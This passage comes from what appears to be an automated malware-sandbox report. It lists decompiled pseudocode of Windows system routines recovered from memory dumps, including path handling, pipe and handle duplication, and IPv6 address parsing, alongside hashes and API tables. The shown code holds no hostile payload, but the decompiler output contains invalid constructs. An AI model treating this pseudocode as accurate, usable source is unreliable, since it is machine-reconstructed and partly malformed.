					_t155 = _t212;
					_t230 = _t155 + 2;
					do {
						_t227 =  *_t155;
						_t155 = _t155 + 2;
					} while (_t227 != 0);
					if(_t155 == _t230) {
						goto L59;
					}
					_t159 = _t212;
					_t229 = _t159 + 2;
					do {
						_t220 =  *_t159;
						_t159 = _t159 + 2;
					} while (_t220 != 0);
					if(_t159 == _t229) {
						goto L58;
					}
					_t187 =  *_v540;
					_t164 =  *_v540;
					_t231 = _t164 + 2;
					do {
						_t228 =  *_t164;
						_t164 = _t164 + 2;
					} while (_t228 != 0);
					_t167 = _t164 - _t231 >> 1;
					_t220 = _t212 + 2;
					do {
						_t229 =  *_t212;
						_t212 = _t212 + 2;
					} while (_t229 != 0);
					if((_t212 - _t220 >> 1) + _t167 + 1 > 0x104) {
						goto L58;
					}
					E4A55185A(_v532, _a16, _t187);
					_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
					goto L65;
				}
				if(_a20 == 0 ||  *((short*)(E4A552ED1( *_t229))) != 0x2a ||  *((short*)(E4A562348( *_t229))) != 0x5c) {
					L4:
					_t185 = _v532;
					if(E4A561D9B(_t189, _t185, _a16,  *_v540,  *((intOrPtr*)(_t232 + 4))) != 0) {
						E4A56056B(_t172);
						_v536 = 1;
					}
					_t232 = 0x104;
					if(GetFullPathNameW(_t185, 0x104,  &_v528, 0) > 0x104) {
						E4A56056B(0x6f);
						goto L74;
					} else {
						goto L6;
					}
				} else {
					_t179 = E4A552148( *((intOrPtr*)(_t232 + 4)), 0x5c);
					if(_t179 == 0) {
						_t180 =  *((intOrPtr*)(_t232 + 4));
						if( *((short*)(_t180 + 2)) == 0x3a) {
							_t180 = _t180 + 4;
						}
					} else {
						_t180 = _t179 + 2;
					}
					if(( *(_t232 + 0x1c) & 0x00000200) != 0) {
						_t220 = 0x234;
						_t217 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
						_t188 = _t217 + 2;
						do {
							_t229 =  *_t217;
							_t217 = _t217 + 2;
						} while (_t229 != 0);
						_t219 = _t217 - _t188;
						_t189 = _t219 >> 1;
						if(_t219 != 0) {
							_t189 = 0;
							 *_t180 = 0;
							E4A5520A9(_t232,  *((intOrPtr*)(_t232 + 4)),  *((intOrPtr*)(_t232 + 8)),  *((intOrPtr*)(_t232 + 0x18)) + 0x234);
						}
					}
					goto L4;
				}
			}





























































                                0x4a561ca5
                                0x4a561ca5
                                0x4a561cb0
                                0x4a561cb7
                                0x4a561cba
                                0x4a561cbd
                                0x4a561cc5
                                0x4a561cc9
                                0x4a561ccd
                                0x4a561cd0
                                0x4a561cd6
                                0x4a561cdc
                                0x4a561ce4
                                0x4a56886d
                                0x4a568872
                                0x4a568874
                                0x4a568877
                                0x4a568877
                                0x4a56887b
                                0x4a56887c
                                0x4a568881
                                0x4a56888c
                                0x4a56888f
                                0x4a568893
                                0x4a5688ad
                                0x4a5688af
                                0x4a5688b2
                                0x4a5688b6
                                0x4a5688bd
                                0x4a56892e
                                0x4a56892e
                                0x4a568930
                                0x4a568933
                                0x4a568933
                                0x4a568937
                                0x4a568938
                                0x4a568942
                                0x4a568945
                                0x4a568947
                                0x4a568949
                                0x4a56894c
                                0x4a56894c
                                0x4a568950
                                0x4a568951
                                0x4a568963
                                0x00000000
                                0x00000000
                                0x4a568969
                                0x00000000
                                0x4a5688bf
                                0x4a5688c2
                                0x4a5688c8
                                0x4a5688ca
                                0x4a5688cd
                                0x4a5688cd
                                0x4a5688d1
                                0x4a5688d2
                                0x4a5688db
                                0x00000000
                                0x00000000
                                0x4a5688dd
                                0x4a5688df
                                0x4a5688e2
                                0x4a5688e2
                                0x4a5688e6
                                0x4a5688e7
                                0x4a5688f0
                                0x4a568aef
                                0x4a568aef
                                0x4a561d52
                                0x4a561d56
                                0x4a561d7f
                                0x4a561d93
                                0x4a561d93
                                0x4a561d58
                                0x4a561d65
                                0x4a561d70
                                0x4a561d79
                                0x00000000
                                0x00000000
                                0x4a568afe
                                0x4a568afe
                                0x4a568b17
                                0x4a568b1c
                                0x4a568b23
                                0x4a568b34
                                0x4a568b37
                                0x4a568b38
                                0x4a568b40
                                0x4a568b56
                                0x4a568b59
                                0x4a568b81
                                0x4a568b5b
                                0x4a568b5d
                                0x4a568b63
                                0x4a568b6b
                                0x4a568b6d
                                0x4a568b6d
                                0x4a568b73
                                0x4a568b73
                                0x4a568b5d
                                0x4a568b59
                                0x4a568b40
                                0x4a568b1c
                                0x00000000
                                0x4a561d65
                                0x4a5688f6
                                0x4a5688f8
                                0x4a5688fb
                                0x4a5688fb
                                0x4a5688ff
                                0x4a568900
                                0x4a568907
                                0x4a568909
                                0x4a56890b
                                0x4a56890e
                                0x4a56890e
                                0x4a568912
                                0x4a568913
                                0x4a568925
                                0x00000000
                                0x00000000
                                0x4a56892b
                                0x4a56896a
                                0x4a56896a
                                0x4a56896d
                                0x4a56896e
                                0x00000000
                                0x4a56896e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a568895
                                0x4a568895
                                0x4a568898
                                0x4a56889a
                                0x4a56889a
                                0x4a56889d
                                0x4a56889e
                                0x4a5688a4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5688a4
                                0x4a561cf5
                                0x4a56897f
                                0x4a568a13
                                0x4a568a19
                                0x4a568a1b
                                0x4a568a1d
                                0x4a568a20
                                0x4a568a20
                                0x4a568a24
                                0x4a568a25
                                0x4a568a2e
                                0x4a568a33
                                0x4a568a36
                                0x4a568a39
                                0x4a568a39
                                0x4a568a3d
                                0x4a568a3e
                                0x4a568a50
                                0x4a568a08
                                0x4a568a08
                                0x00000000
                                0x4a568a08
                                0x4a568a5c
                                0x4a568a64
                                0x4a568a67
                                0x4a568a71
                                0x4a568a76
                                0x00000000
                                0x4a568a76
                                0x4a568988
                                0x4a56898e
                                0x4a568990
                                0x4a568993
                                0x4a568993
                                0x4a568997
                                0x4a568998
                                0x4a5689a1
                                0x00000000
                                0x00000000
                                0x4a5689a3
                                0x4a5689a5
                                0x4a5689a8
                                0x4a5689a8
                                0x4a5689ac
                                0x4a5689ad
                                0x4a5689b6
                                0x00000000
                                0x00000000
                                0x4a5689be
                                0x4a5689c0
                                0x4a5689c2
                                0x4a5689c5
                                0x4a5689c5
                                0x4a5689c9
                                0x4a5689ca
                                0x4a5689d1
                                0x4a5689d3
                                0x4a5689d6
                                0x4a5689d6
                                0x4a5689da
                                0x4a5689db
                                0x4a5689ed
                                0x00000000
                                0x00000000
                                0x4a5689f9
                                0x4a568a01
                                0x00000000
                                0x4a568a01
                                0x4a561cff
                                0x4a561d12
                                0x4a561d1d
                                0x4a561d2e
                                0x4a568ad4
                                0x4a568ad9
                                0x4a568ad9
                                0x4a561d3d
                                0x4a561d4c
                                0x4a568aea
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56231d
                                0x4a562322
                                0x4a562329
                                0x4a568a81
                                0x4a568a89
                                0x4a568a8f
                                0x4a568a8f
                                0x4a56232f
                                0x4a562330
                                0x4a562330
                                0x4a562338
                                0x4a568a9a
                                0x4a568a9f
                                0x4a568aa1
                                0x4a568aa4
                                0x4a568aa4
                                0x4a568aa8
                                0x4a568aa9
                                0x4a568aae
                                0x4a568ab0
                                0x4a568ab2
                                0x4a568ab8
                                0x4a568aba
                                0x4a568ac9
                                0x4a568ac9
                                0x4a568ab2
                                0x00000000
                                0x4a562338

                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000,?,?,?,00000000,00000104,?), ref: 4A561D44
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FullNamePath
                                • String ID:
                                • API String ID: 608056474-0
                                • Opcode ID: 221739eed6365d617caaa56260bdc32d4bb34ec9306c81bdfe489519637a6edf
                                • Instruction ID: 53e1f99c1791a16143d83dc7bd38825d34a8f6d5f9accf72fbef52951fef214e
                                • Opcode Fuzzy Hash: 221739eed6365d617caaa56260bdc32d4bb34ec9306c81bdfe489519637a6edf
                                • Instruction Fuzzy Hash: 5FC16C31500606DFD725EF28CE84BAA77B5FF44314F0645A8E84ADF2A5EB71EA45CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022CFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E022CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E022CEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E022CEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E022C685D(_t167, 4) == 0) {
								if(E022C685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E022C685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E022C685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E022A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0229DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E022CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E022CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                0x022cfcd1
                                0x022cfcd6
                                0x022cfcd9
                                0x022cfcdc
                                0x022cfcdf
                                0x022cfce2
                                0x022cfce5
                                0x022cfce8
                                0x022cfceb
                                0x022cfced
                                0x022cfced
                                0x022cfcf3
                                0x00000000
                                0x00000000
                                0x022cfcfc
                                0x022cfcfe
                                0x022cfdc1
                                0x022fecbd
                                0x00000000
                                0x022feccc
                                0x022feccc
                                0x022fecd2
                                0x00000000
                                0x00000000
                                0x022fecdf
                                0x022fece0
                                0x022fece4
                                0x022feceb
                                0x022fecee
                                0x022feca8
                                0x022feca8
                                0x022fecaa
                                0x022cfd76
                                0x022cfd79
                                0x022cfdb4
                                0x022cfdb5
                                0x022cfdb6
                                0x00000000
                                0x022cfdb6
                                0x022cfd7e
                                0x022fecfc
                                0x022cfe2f
                                0x00000000
                                0x022cfe2f
                                0x022fed08
                                0x022fed0f
                                0x022fed17
                                0x022fed1b
                                0x00000000
                                0x022fed1b
                                0x022cfd88
                                0x00000000
                                0x00000000
                                0x022cfd94
                                0x022cfd99
                                0x022cfda1
                                0x00000000
                                0x00000000
                                0x022cfdb0
                                0x00000000
                                0x022cfdb0
                                0x022fecbd
                                0x022cfdc7
                                0x022cfdcb
                                0x00000000
                                0x022cfdd7
                                0x022cfde3
                                0x022cfe06
                                0x022e1fe7
                                0x00000000
                                0x00000000
                                0x022e1fef
                                0x022e1ff0
                                0x022e1ff4
                                0x022e1ff7
                                0x022e1ffa
                                0x022e1ffd
                                0x022e2000
                                0x00000000
                                0x00000000
                                0x022fecf1
                                0x00000000
                                0x022fecf1
                                0x00000000
                                0x022cfe06
                                0x022cfde8
                                0x022cfdec
                                0x022cfdef
                                0x022cfdf2
                                0x00000000
                                0x022cfdf2
                                0x022cfdcb
                                0x022cfd04
                                0x022cfd05
                                0x022fec67
                                0x00000000
                                0x00000000
                                0x022fec6f
                                0x00000000
                                0x022fec6f
                                0x022cfd13
                                0x022cfd3c
                                0x022cfd40
                                0x022fec75
                                0x022fec7a
                                0x00000000
                                0x022fec8a
                                0x022fec8a
                                0x022fec90
                                0x022fecb2
                                0x022cfd73
                                0x022cfd73
                                0x00000000
                                0x022cfd73
                                0x022fec95
                                0x00000000
                                0x00000000
                                0x022feca1
                                0x022feca4
                                0x022feca5
                                0x00000000
                                0x022feca5
                                0x022fec7a
                                0x022cfd4a
                                0x00000000
                                0x022cfd6e
                                0x022cfd6e
                                0x022cfd71
                                0x00000000
                                0x022cfd71
                                0x022cfd4a
                                0x022cfd21
                                0x022da3a1
                                0x00000000
                                0x022da3a1
                                0x022cfd36
                                0x022e200b
                                0x022e2012
                                0x00000000
                                0x00000000
                                0x022e2018
                                0x00000000
                                0x022e2018
                                0x00000000
                                0x022cfd36
                                0x022cfe0f
                                0x022cfe16
                                0x022da3ad
                                0x00000000
                                0x00000000
                                0x022da3b3
                                0x022da3b3
                                0x022cfe1f
                                0x022fed25
                                0x022fed86
                                0x00000000
                                0x00000000
                                0x022fed91
                                0x022fed95
                                0x022fed95
                                0x022fed9a
                                0x022fedad
                                0x022fedb3
                                0x022fedba
                                0x022fedc4
                                0x022fedc9
                                0x00000000
                                0x022fedcc
                                0x022fed2a
                                0x022fed55
                                0x00000000
                                0x00000000
                                0x022fed61
                                0x022fed66
                                0x022fed6e
                                0x00000000
                                0x00000000
                                0x022fed7d
                                0x00000000
                                0x022fed7d
                                0x022fed30
                                0x00000000
                                0x00000000
                                0x022fed3c
                                0x022fed43
                                0x022fed4b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __fassign
                                • String ID:
                                • API String ID: 3965848254-0
                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                • Instruction ID: 0d5004213d9eeb3d01a9f5ef484e81d02a15bd32b8b761cb3f07b4ab10436b1a
                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                • Instruction Fuzzy Hash: 44919D71D2020AEADF24CFD8C9447AEB7B6EF45309F30827FE805A6659E7704A41CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55CBC3, Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E4A55CBC3(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				short _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
				void* __ebx;
				struct _CONSOLE_SCREEN_BUFFER_INFO* __ecx;
				void* __edi;
				void** __esi;
				char _t39;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t55;

				_push(_t48);
				_t39 = _a4;
				_t45 =  *((intOrPtr*)(_t39 + 0x38));
				_v12 =  *((intOrPtr*)(_t39 + 0x3c));
				_t41 = E4A551896(0x28);
				_t55 = _t41;
				if(_t55 == 0) {
					L24:
					goto L21;
				} else {
					__imp___pipe(__esi, 0, 0x8000);
					__esp = __esp + 0xc;
					__eflags = __eax;
					if(__eax != 0) {
						_push(0);
						__eax = E4A556D44(__ecx);
						__ecx = 8;
						_pop(__ecx);
						goto L24;
					} else {
						E4A553B3E( *__esi) = E4A553B3E(__esi[1]);
						__eax =  *0x4a574184; // 0x0
						 *0x4a574184 =  *0x4a574184 + 1;
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *0x4a57410c; // 0x0
							 *(__eax + 0x24) = __esi;
							__eax =  *0x4a57410c; // 0x0
							__esi[8] = __eax;
							__esi[9] = 0;
							 *0x4a57410c = __esi;
						} else {
							 *0x4a57410c = __esi;
							 *0x4a574108 = __esi;
							__esi[8] = 0;
						}
						__eax = E4A554794(__eax, 1);
						__esi[3] = __eax;
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__esi[3] = __esi[3] | __eax;
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A5546D3(__eax, __esi[1], 1);
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A553AB3(__esi[1]);
						__esi[1] = __edi;
						__eflags =  *__ebx - __edi;
						if( *__ebx <= __edi) {
							 &_a4 = E4A5541DD(__ebx,  &_a4);
						}
						__eax = E4A551492(1, __ebx);
						_v8 = __eax;
						__eflags =  *0x4a574180 - __edi; // 0x0
						if(__eflags != 0) {
							__imp___get_osfhandle( *__esi, __edi, __edi, __edi, __edi, 1);
							_pop(__ecx);
							__eax = DuplicateHandle( *0x4a574180, __eax, ??, ??, ??, ??, ??);
						}
						__eax = E4A5546D3(__eax, __esi[3], 1);
						__ebx = __ebx | 0xffffffff;
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A553AB3(__esi[3]);
						__esi[3] = __edi;
						__eflags = _v8 - __edi;
						if(_v8 != __edi) {
							 *0x4a590908 = 2;
							__eax = E4A56FCA6(__ebx, __ecx, __edx, __edi, __esi);
						}
						__eax =  *0x4a574180; // 0x0
						__esi[4] = __eax;
						__eax =  *0x4a5741bc; // 0x0
						__esi[6] = __eax;
						 *0x4a574180 = __edi;
						 *0x4a5741bc = __edi;
						__eax = E4A554794(__eax, __edi);
						__esi[2] = __eax;
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__esi[2] = __ebx;
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A5546D3(__eax,  *__esi, __edi);
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A553AB3( *__esi);
						__ebx = _v12;
						 *__esi = __edi;
						__eflags =  *__ebx - __edi;
						if( *__ebx <= __edi) {
							 &_a4 = E4A5541DD(__ebx,  &_a4);
						}
						__eax = E4A551492(1, __ebx);
						__ebx = __eax;
						__eax = E4A5546D3(__eax, __esi[2], __edi);
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__eax = E4A56EA5F(__ecx);
						}
						__eax = E4A553AB3(__esi[2]);
						__esi[2] = __edi;
						__eflags = __ebx - __edi;
						if(__ebx != __edi) {
							 *0x4a590908 = 2;
							__eax = E4A56FCA6(__ebx, __ecx, __edx, __edi, __esi);
							asm("int3");
							__ecx =  &_v28;
							__eax = GetConsoleScreenBufferInfo(__eax,  &_v28);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = _v16;
								__esi = _v12;
								__ebx = _v28.dwSize;
								_v12 - _v16 = _v12 - _v16 + 1;
							}
							 *0x0000001C = _t55;
							 *0x00000020 = _t45;
							return _t41;
						} else {
							__eax =  *0x4a574180; // 0x0
							__esi[5] = __eax;
							__eax =  *0x4a5741bc; // 0x0
							__esi[7] = __eax;
							 *0x4a574184 =  *0x4a574184 - 1;
							__eflags =  *0x4a574184;
							 *0x4a574180 = __edi;
							 *0x4a5741bc = __edi;
							if( *0x4a574184 != 0) {
								__eax = __ebx;
							} else {
								__eax = E4A55CD8B();
							}
							L21:
							return 1;
						}
					}
				}
			}















                                0x4a55cbc9
                                0x4a55cbca
                                0x4a55cbce
                                0x4a55cbd8
                                0x4a55cbdb
                                0x4a55cbe0
                                0x4a55cbe6
                                0x4a567876
                                0x00000000
                                0x4a55cbec
                                0x4a55cbf3
                                0x4a55cbf9
                                0x4a55cbfc
                                0x4a55cbfe
                                0x4a56787e
                                0x4a567881
                                0x4a567886
                                0x4a567887
                                0x00000000
                                0x4a55cc04
                                0x4a55cc0e
                                0x4a55cc13
                                0x4a55cc18
                                0x4a55cc1e
                                0x4a55cc20
                                0x4a560c2e
                                0x4a560c33
                                0x4a560c36
                                0x4a560c3b
                                0x4a560c3e
                                0x4a560c41
                                0x4a55cc26
                                0x4a55cc26
                                0x4a55cc2c
                                0x4a55cc32
                                0x4a55cc32
                                0x4a55cc37
                                0x4a55cc3c
                                0x4a55cc3f
                                0x4a55cc42
                                0x4a56788a
                                0x4a56788d
                                0x4a56788d
                                0x4a55cc4d
                                0x4a55cc52
                                0x4a55cc55
                                0x4a567897
                                0x4a567897
                                0x4a55cc5e
                                0x4a55cc63
                                0x4a55cc66
                                0x4a55cc68
                                0x4a55cc6f
                                0x4a55cc6f
                                0x4a55cc77
                                0x4a55cc7c
                                0x4a55cc7f
                                0x4a55cc85
                                0x4a55cc8f
                                0x4a55cc95
                                0x4a55cc9d
                                0x4a55cc9d
                                0x4a55cca8
                                0x4a55ccad
                                0x4a55ccb0
                                0x4a55ccb2
                                0x4a5678a1
                                0x4a5678a1
                                0x4a55ccbb
                                0x4a55ccc0
                                0x4a55ccc3
                                0x4a55ccc6
                                0x4a5678ab
                                0x4a5678b5
                                0x4a5678b5
                                0x4a55cccc
                                0x4a55ccd1
                                0x4a55ccd4
                                0x4a55ccd9
                                0x4a55ccdd
                                0x4a55cce3
                                0x4a55cce9
                                0x4a55ccee
                                0x4a55ccf1
                                0x4a55ccf3
                                0x4a5678bf
                                0x4a5678c2
                                0x4a5678c2
                                0x4a55ccfc
                                0x4a55cd01
                                0x4a55cd03
                                0x4a5678cc
                                0x4a5678cc
                                0x4a55cd0b
                                0x4a55cd10
                                0x4a55cd13
                                0x4a55cd15
                                0x4a55cd17
                                0x4a55cd1e
                                0x4a55cd1e
                                0x4a55cd26
                                0x4a55cd2f
                                0x4a55cd31
                                0x4a55cd36
                                0x4a55cd39
                                0x4a5678d6
                                0x4a5678d6
                                0x4a55cd42
                                0x4a55cd47
                                0x4a55cd4a
                                0x4a55cd4c
                                0x4a5678e0
                                0x4a5678ea
                                0x4a5678ef
                                0x4a5678f0
                                0x4a5678f5
                                0x4a5678fb
                                0x4a5678fd
                                0x4a567903
                                0x4a567907
                                0x4a56790b
                                0x4a567911
                                0x4a567911
                                0x4a55b401
                                0x4a55b404
                                0x4a55b40b
                                0x4a55cd52
                                0x4a55cd52
                                0x4a55cd57
                                0x4a55cd5a
                                0x4a55cd5f
                                0x4a55cd62
                                0x4a55cd62
                                0x4a55cd68
                                0x4a55cd6e
                                0x4a55cd74
                                0x4a560c4c
                                0x4a55cd7a
                                0x4a55cd7a
                                0x4a55cd7a
                                0x4a55cd7f
                                0x4a55cd83
                                0x4a55cd83
                                0x4a55cd4c
                                0x4a55cbfe

                                APIs
                                  • Part of subcall function 4A551896: GetProcessHeap.KERNEL32(00000008,4A5525C0,4A5525BB,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C), ref: 4A5518A9
                                  • Part of subcall function 4A551896: HeapAlloc.KERNEL32(00000000,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6), ref: 4A5518B0
                                • _pipe.MSVCRT ref: 4A55CBF3
                                  • Part of subcall function 4A554794: _dup.MSVCRT ref: 4A55479D
                                  • Part of subcall function 4A5546D3: _dup2.MSVCRT ref: 4A5546E4
                                  • Part of subcall function 4A553AB3: _close.MSVCRT ref: 4A553AED
                                • _get_osfhandle.MSVCRT ref: 4A55CC8F
                                • DuplicateHandle.KERNEL32 ref: 4A55CC9D
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe
                                • String ID:
                                • API String ID: 2751104949-0
                                • Opcode ID: c0f4447e9f66df73e59db6f7fc44719e3fff01dffa557a66d12772225fba2cd0
                                • Instruction ID: e836a966e05ce9bfa81b71943a0262d12d6df10542fc48da683e8e12a80775d1
                                • Opcode Fuzzy Hash: c0f4447e9f66df73e59db6f7fc44719e3fff01dffa557a66d12772225fba2cd0
                                • Instruction Fuzzy Hash: 4261F6B4500611EFD721AF65CB44A1ABFFCFF92320B10892FE459EA56AEB709841CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A555A56, Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E4A555A56(void* __edx, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr* _t13;
				intOrPtr* _t21;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t37;
				signed int _t38;
				wchar_t* _t39;
				wchar_t* _t40;
				long _t43;
				short* _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t51;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				void* _t62;
				wchar_t* _t65;

				_t56 = __edx;
				_t10 = _a4;
				if( *0x4a574081 == 0) {
					_t60 = E4A5522CA( *(_t10 + 0x3c), 0x4a56bd20, 3);
					_t43 = 0;
					if( *_t60 == 0) {
						L22:
						return E4A56C936( *0x4a5741c4);
					}
					_t48 = _t60;
					do {
						_t13 = _t48;
						_t4 = _t13 + 2; // 0x2
						_t62 = _t4;
						do {
							_t57 =  *_t13;
							_t13 = _t13 + 2;
						} while (_t57 != 0);
						_t48 = _t48 + 2 + (_t13 - _t62 >> 1) * 2;
						_t43 = _t43 + 1;
					} while ( *_t48 != _t57);
					if(_t43 > 3) {
						L36:
						_push(0);
						_push(0x232a);
						E4A556D44(_t48);
						return 1;
					}
					_t44 = E4A55413B(_t60);
					if( *_t44 != 0x3d) {
						goto L36;
					}
					_t21 = _t60;
					_t8 = _t21 + 2; // 0x2
					_t58 = _t8;
					do {
						_t51 =  *_t21;
						_t21 = _t21 + 2;
					} while (_t51 != 0);
					E4A55185A(_t60, (_t21 - _t58 >> 1) + 1, E4A552598(_t51, _t60));
					_t27 = _t60;
					_t9 = _t27 + 2; // 0x2
					_t59 = _t9;
					do {
						_t48 =  *_t27;
